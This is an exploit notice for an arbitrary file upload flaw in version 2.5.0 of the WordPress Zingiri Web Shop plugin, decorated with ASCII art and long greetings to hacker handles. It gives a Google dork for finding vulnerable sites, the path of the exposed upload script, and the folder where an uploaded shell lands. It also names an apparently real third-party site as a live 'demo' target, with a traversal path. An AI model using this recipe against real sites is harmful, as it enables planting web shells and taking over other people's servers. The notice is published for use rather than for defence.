((|))((|))                      ((|))    |)|    (|)|           |)
     ((|))             ***********************                   
     ((|))              *********************                    
  *  ((|))             *                     *                   
 *0* ((|))            *   In the name of GOD  *                  
  *  ((|))             *                     *                   
 -|- ((|))               *******************                     
  |  ((|))                    *********                          
((|))((|))((|))################((|))########################((|))
# Exploit Title: Wordpress Zingiri-web-shop 2.5.0 Plugin    ((|))
# Arbitrary File Upload Vulnerability                       ((|))
# Version: 2.5.0                                                #
# Software Link: www.zingiri.com/plugins-and-addons/web-shop/   #
# Google Dork: inurl:"/wp-content/plugins/zingiri-web-shop/"    #
# Exploit Author: Ashiyane Digital Security Team                #
# Category: Web Application                                     #
# Tested on: Windows 7                                          #
###############################((|))#############################
#******************************((|))****************************#
#* Location:  http://site.com/wp-content/                       #
#* /plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/       #
#* tiny_mce/plugins/ajaxfilemanager/                            #
#* ajaxfilemanager.php?path=[path]                              #
#* Files Upload To: http://site.com/wp-content/plugins/         #
#* fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/#
#* uploaded/file/[Yourshell.X]                                  #
#* Demo: http://vishandelpietkorf.nl/vishandelpietkorf/         #
#* wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/      #
#* jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php#
#* ?path=/home/vhosting/a/vhost0015706/domains/                 #
#* vishandelpietkorf.nl/htdocs/www/vishandelpietkorf/wp-content #
#* /plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/       #
#* tiny_mce/plugins/ajaxfilemanager/inc/                        #
#* ../../../../../../../../../../uploads/                       #
#* zingiri-web-shop/pekelhc/                                    #
#******************************((|))****************************#
#******************************((|))****************************#
#******************************((|))****************************#
#*                       *****************                      #
#*                       *               *                      #
#* Greetz to:            * My lord ALLAH *                      #
#*                       *               *                      #
#*                       *****************                      #
#*                          **((|))**                           #
#* Sp Tnx To: Muslims From All Over The World                   #
#* Behrooz_Ice,Q7X,Ali_Eagle,Azazel,iman_taktaz,sha2ow,,ERroR   #
#* 0x21HATE,A.S.P.I.R.I.N,am118,Angel--D3m0n,angola,AR455,Azad™ #
#* Black-Hole,Classic,Encoder,HASSAN20,HidDeEn,hossein19123     #
#* jooooondost,Kaz3m,ll_Invisible_ll,majidflash,megacpu         #
#* MehrdadLinux,Milad-Bushehr,MostafaBestMan,MR.SAMAN,Mute,N4H  #
#* Pr0grammer,PrinceofHacking,Rizux,Rz04,S!YOU.T4r.6T,Sil3nt Di3#
#* The Smith,unique2world,Unline,V!T0N,X-HIDDEN-X      ((|))    #
#* Crypt0,khatarnak,Milad22,MR.Vinci,Pirjo,V1R4N64R *  ((|))  * #
#* And All Of My Friends                           -|- ((|)) -|-#
#* The Last One : My Self, B4b4K KH4TaR            /|\ ((|)) /|\#
((|))*********************************************((|))((|))((|))
((|))#############################################((|))((|))((|))
((|))                         ((|))               ((|))((|))((|))